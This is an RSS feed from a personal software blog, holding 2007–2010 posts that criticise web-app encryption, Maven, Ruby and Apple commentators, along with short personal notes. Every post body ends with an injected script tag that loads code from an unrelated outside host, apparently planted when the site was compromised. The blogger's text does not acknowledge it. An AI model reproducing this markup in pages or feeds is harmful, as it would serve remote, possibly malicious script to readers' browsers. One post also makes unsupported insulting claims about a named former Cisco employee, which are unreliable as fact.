<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Curmudgeonly &#187; Uncategorized</title>
	<atom:link href="http://blog.crispywalrus.net/category/uncategorized/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.crispywalrus.net</link>
	<description>The business of messy software</description>
	<lastBuildDate>Thu, 01 Jul 2010 22:19:28 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Yay! Bruce Schneier validates me &#8230; impersonally</title>
		<link>http://blog.crispywalrus.net/2010/07/01/yay-bruce-schneier-validates-me-impersonally/</link>
		<comments>http://blog.crispywalrus.net/2010/07/01/yay-bruce-schneier-validates-me-impersonally/#comments</comments>
		<pubDate>Thu, 01 Jul 2010 22:19:28 +0000</pubDate>
		<dc:creator>crispy</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.crispywalrus.net/2010/07/01/yay-bruce-schneier-validates-me-impersonally/</guid>
		<description><![CDATA[For years I&#8217;ve complained to coworker and &#8220;bosses&#8221; that&#160;encrypting&#160;data in a web app was foolish. If the key had to be&#160;available&#160;at run time the same access that granted a hacker acces gave her the key to the data as well. A one way hash of constant data is really no better and adding salts doesn&#8217;t [...]]]></description>
			<content:encoded><![CDATA[<p>For years I&#8217;ve complained to coworker and &#8220;bosses&#8221; that&nbsp;encrypting&nbsp;data in a web app was foolish. If the key had to be&nbsp;available&nbsp;at run time the same access that granted a hacker acces gave her the key to the data as well. A one way hash of constant data is really no better and adding salts doesn&#8217;t actually increase security since, like keys, they&#8217;re available at runtime. Now I&#8217;ve got a club now hopefully<a href="http://www.schneier.com/blog/archives/2010/06/data_at_rest_vs.html"> this</a>&nbsp;article by Bruce Schneier will allow me to drive a nail into the coffin of such schemes. Of course the reality is that none of those who&#8217;ve suggested these schemes will be&nbsp;deterred, as they know more than anyone else does anyway.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.crispywalrus.net/2010/07/01/yay-bruce-schneier-validates-me-impersonally/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>That Charlie Stross</title>
		<link>http://blog.crispywalrus.net/2010/03/12/that-charlie-stross/</link>
		<comments>http://blog.crispywalrus.net/2010/03/12/that-charlie-stross/#comments</comments>
		<pubDate>Sat, 13 Mar 2010 03:27:35 +0000</pubDate>
		<dc:creator>crispy</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.crispywalrus.net/2010/03/12/that-charlie-stross/</guid>
		<description><![CDATA[Charlie Stross is a guy who really writes his blog. A whole essay, not just a stretched out twitter post. I could  wish i could write like that, seemingly effortless cranking out the verbage. Yet in the end it all wraps up neat and tidily. It doesn&#8217;t seem like any amount of effort on [...]]]></description>
			<content:encoded><![CDATA[<p>Charlie Stross is a guy who really writes his blog. A whole essay, not just a stretched out twitter post. I could  wish i could write like that, seemingly effortless cranking out the verbage. Yet in the end it all wraps up neat and tidily. It doesn&#8217;t seem like any amount of effort on my part will ever get me there, but here&#8217;s to committing to try.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.crispywalrus.net/2010/03/12/that-charlie-stross/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>python and ruby</title>
		<link>http://blog.crispywalrus.net/2009/11/17/python-and-ruby/</link>
		<comments>http://blog.crispywalrus.net/2009/11/17/python-and-ruby/#comments</comments>
		<pubDate>Tue, 17 Nov 2009 17:41:17 +0000</pubDate>
		<dc:creator>crispy</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.crispywalrus.net/?p=58</guid>
		<description><![CDATA[I&#8217;ve been coding java professionally since 1997, started with java 1.0.3 as a matter of fact. Back then java was not clearly better. Python existed, and in fact I built some systems with it. I worked on the OS/2 port of python implementing and maintaining the threading and os modules. Not only did python run [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been coding java professionally since 1997, started with java 1.0.3 as a matter of fact. Back then java was not clearly better. Python existed, and in fact I built some systems with it. I worked on the OS/2 port of python implementing and maintaining the threading and os modules. Not only did python run more reliably but it was faster. Somehow though java won, the crowd chose the tool closest to the last tool and away we went. Nowadays everybody seems enamored of ruby, due I hope to rails and it&#8217;s active record focus, because the language itself stinks. It&#8217;s painfully slow, and really how many different ways does a language need to express greater than?  Having gone through the excercise I can honestly say Rails is a fine &#8220;contractor&#8221; framework. When you only need to finish 80% of an app, it&#8217;s the fastest way there. As long as you&#8217;re not on the hook to reach 100% it&#8217;s great.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.crispywalrus.net/2009/11/17/python-and-ruby/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Maven</title>
		<link>http://blog.crispywalrus.net/2008/09/05/maven/</link>
		<comments>http://blog.crispywalrus.net/2008/09/05/maven/#comments</comments>
		<pubDate>Fri, 05 Sep 2008 19:15:52 +0000</pubDate>
		<dc:creator>crispy</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.crispywalrus.net/?p=49</guid>
		<description><![CDATA[you&#8217;d think with all the whiz bang great rad tools someone would have written something better that make (after all it&#8217;s over 30 years old) It seems that the best we can do though it different. Except for maven! Maven is like make, but worse. You can write new rules but you have to be [...]]]></description>
			<content:encoded><![CDATA[<p>you&#8217;d think with all the whiz bang great rad tools someone would have written something better that make (after all it&#8217;s over 30 years old) It seems that the best we can do though it different. Except for maven! Maven is like make, but worse. You can write new rules but you have to be a wizard to do so and god forbid you want to do something non-standard. Sure there&#8217;s a plugin for it, but it doesn&#8217;t actually work correctly or do what you actually want. Plus depending on POM definitions written by the kind of asshat who uses maven means doing what i just did, downloading glassfish!</p>
<p>Asshats of the year maven team!<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.crispywalrus.net/2008/09/05/maven/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>End of an Era (at CMSG)</title>
		<link>http://blog.crispywalrus.net/2008/08/19/end-of-an-era-at-cmsg/</link>
		<comments>http://blog.crispywalrus.net/2008/08/19/end-of-an-era-at-cmsg/#comments</comments>
		<pubDate>Wed, 20 Aug 2008 01:34:10 +0000</pubDate>
		<dc:creator>crispy</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.crispywalrus.net/?p=45</guid>
		<description><![CDATA[So the word on the street is that Mike (baby kicker) O&#8217;Donnell has left Cisco&#8217;s Media Solutions Group. Mike embodies all the attributes of the modern snake-oil enterprise software salesman. And yes, he really kicked a baby, and then had the gaul to cuss out the mother for getting said baby into Mikes very important [...]]]></description>
			<content:encoded><![CDATA[<p>So the word on the street is that Mike (baby kicker) O&#8217;Donnell has left Cisco&#8217;s Media Solutions Group. Mike embodies all the attributes of the modern snake-oil enterprise software salesman. And yes, he really kicked a baby, and then had the gaul to cuss out the mother for getting said baby into Mikes very important path.</p>
<p>In the end, who really cares? Nobody but the poor shmucks Mike will torment at his next gig. All I can say is keep kicking those babies, maybe one of them will turn out to be full of gold.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.crispywalrus.net/2008/08/19/end-of-an-era-at-cmsg/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title></title>
		<link>http://blog.crispywalrus.net/2008/08/13/42/</link>
		<comments>http://blog.crispywalrus.net/2008/08/13/42/#comments</comments>
		<pubDate>Wed, 13 Aug 2008 16:17:09 +0000</pubDate>
		<dc:creator>crispy</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.crispywalrus.net/?p=42</guid>
		<description><![CDATA[There are a lot of really bright, insightful people. Jean-Louis Gassée seems to think he&#8217;s one of them. 
Let’s step back a little. Apple “pushes” somewhere between 100 and 200 megabytes of updates per month to each Mac user. Last week, the iPhone 2.0.1 update was announced, I connected two iPhones within minutes, the 200Mb [...]]]></description>
			<content:encoded><![CDATA[<p>There are a lot of really bright, insightful people. Jean-Louis Gassée seems to think he&#8217;s one of them. </p>
<blockquote><p>Let’s step back a little. Apple “pushes” somewhere between 100 and 200 megabytes of updates per month to each Mac user. Last week, the iPhone 2.0.1 update was announced, I connected two iPhones within minutes, the 200Mb files were downloaded and installed without a hitch and I haven’t heard any blogosphere complaints on the matter. iTunes has sold billions of songs, serves tens of millions of customers everyday and everything works with very few exceptions. In other words, some very large scale Apple systems do work. As discussed above, the iTunes boss (some say slave driver, a meliorative term in context) in now also in charge of MobileMe.</p></blockquote>
<blockquote><p>And, last week, parts of the Gmail service were down for 15 hours or so. Last month, Amazon’s respected Web Services went down. And, last year, RIM’s servers went down for about half a day in the Western Hemisphere, freaking out Wall Street investment bankers and management consultants. Even the best players must endure their share of false notes.
</p></blockquote>
<blockquote><p>Back to MobileMe today:if you ask subscribers who’ve never experienced a Blackberry’s <smooth delivery of sync, they love MobileMe. It works, it’s easy to set up and in the simple (most frequent) case of a PC/Mac with an iPhone, it does the wireless (OTA, Off The Air) sync job as now advertised. We’ll see how this scales once iPhones are sold in 21 more countries, 43 total starting August 22nd.</p></blockquote>
<p>Then he buried them at the bottom of a <a href="http://www.mondaynote.com/?p=783">long pointless ramble</a>? Oh, I forgot. He&#8217;s the guy who screwed Apple (in cahoots with Scully) and handed the rest of the world over to Bill Gates. What an asshat.</smooth></p></blockquote>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.crispywalrus.net/2008/08/13/42/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The world keeps turning</title>
		<link>http://blog.crispywalrus.net/2008/08/09/the-world-keeps-turning/</link>
		<comments>http://blog.crispywalrus.net/2008/08/09/the-world-keeps-turning/#comments</comments>
		<pubDate>Sun, 10 Aug 2008 02:26:40 +0000</pubDate>
		<dc:creator>crispy</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[blather]]></category>

		<guid isPermaLink="false">http://blog.crispywalrus.net/?p=38</guid>
		<description><![CDATA[Here I am, after 5+ years of building and (at least theoretically) using social networking software setting up a blog. I had one back on tribe but since I&#8217;m not there anymore it hasn&#8217;t been used much. We&#8217;ll see how much effort I can put into blathering my thoughts out into the aether before I [...]]]></description>
			<content:encoded><![CDATA[<p>Here I am, after 5+ years of building and (at least theoretically) using social networking software setting up a blog. I had one back on tribe but since I&#8217;m not there anymore it hasn&#8217;t been used much. We&#8217;ll see how much effort I can put into blathering my thoughts out into the aether before I give it up and go live in a shack in the woods.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.crispywalrus.net/2008/08/09/the-world-keeps-turning/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Have you all gone mad?</title>
		<link>http://blog.crispywalrus.net/2008/03/19/have-you-all-gone-mad/</link>
		<comments>http://blog.crispywalrus.net/2008/03/19/have-you-all-gone-mad/#comments</comments>
		<pubDate>Wed, 19 Mar 2008 22:49:46 +0000</pubDate>
		<dc:creator>crispy</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://people.tribe.net/chris/blog/f3db5102-01a8-4c2e-ae9d-ba7305074cad</guid>
		<description><![CDATA[I noticed in one of the (nearly) pointless (since support currently consists of a single non-developer) support tribes that FOAF is to be disabled? Come on you morons, FOAF and the rest of the semantic web is the future. The fact that your info is in a machine readable format anyway, FOAF just allows you [...]]]></description>
			<content:encoded><![CDATA[<div>I noticed in one of the (nearly) pointless (since support currently consists of a single non-developer) support tribes that FOAF is to be disabled? Come on you morons, FOAF and the rest of the semantic web is the future. The fact that your info is in a machine readable format anyway, FOAF just allows you to participate in the wider web.</div>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.crispywalrus.net/2008/03/19/have-you-all-gone-mad/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>I want this so bad&#8230;</title>
		<link>http://blog.crispywalrus.net/2007/01/10/i-want-this-so-bad/</link>
		<comments>http://blog.crispywalrus.net/2007/01/10/i-want-this-so-bad/#comments</comments>
		<pubDate>Wed, 10 Jan 2007 19:21:08 +0000</pubDate>
		<dc:creator>crispy</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://people.tribe.net/chris/blog/e16eb4c0-1ab5-40b3-908e-434a5eb3438d</guid>
		<description><![CDATA[ 


that I&#8217;ve already started working on the bill of materials! I&#8217;m not the handiest of guys but I have most of the tools except for a soldering gear (how embarrassing.)
the rest is just a trip to Fab@Home depot!
Oooh, i&#8217;m just quivering with excitement!
http://www.fabathome.org/wiki/index.php?title=Main_Page

]]></description>
			<content:encoded><![CDATA[<p><a href="http://people.tribe.net/chris/blog/e16eb4c0-1ab5-40b3-908e-434a5eb3438d"> <img class=" picThumb" src="http://images.tribe.net/tribe/upload/photo/1ca/0ba/1ca0ba3b-91c8-4202-a0e0-01a07d0f17e6.thumb" alt="" width="65" height="48" /><br />
</a></p>
<div>
that I&#8217;ve already started working on the bill of materials! I&#8217;m not the handiest of guys but I have most of the tools except for a soldering gear (how embarrassing.)<br />
the rest is just a trip to Fab@Home depot!</p>
<p>Oooh, i&#8217;m just quivering with excitement!</p>
<p>http://www.fabathome.org/wiki/index.php?title=Main_Page</p></div>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.crispywalrus.net/2007/01/10/i-want-this-so-bad/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>second blog post today!</title>
		<link>http://blog.crispywalrus.net/2007/01/10/second-blog-post-today/</link>
		<comments>http://blog.crispywalrus.net/2007/01/10/second-blog-post-today/#comments</comments>
		<pubDate>Wed, 10 Jan 2007 17:14:54 +0000</pubDate>
		<dc:creator>crispy</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://people.tribe.net/chris/blog/88f8c3d7-f96e-4d28-aa64-2e437bde1e25</guid>
		<description><![CDATA[no freakin&#8217; way!
http://www.sfgate.com/cgi-bin/article.cgi?file=/baycitynews/archive/2007/01/09/kink09.DTL

]]></description>
			<content:encoded><![CDATA[<div>no freakin&#8217; way!</p>
<p>http://www.sfgate.com/cgi-bin/article.cgi?file=/baycitynews/archive/2007/01/09/kink09.DTL</p></div>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.crispywalrus.net/2007/01/10/second-blog-post-today/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
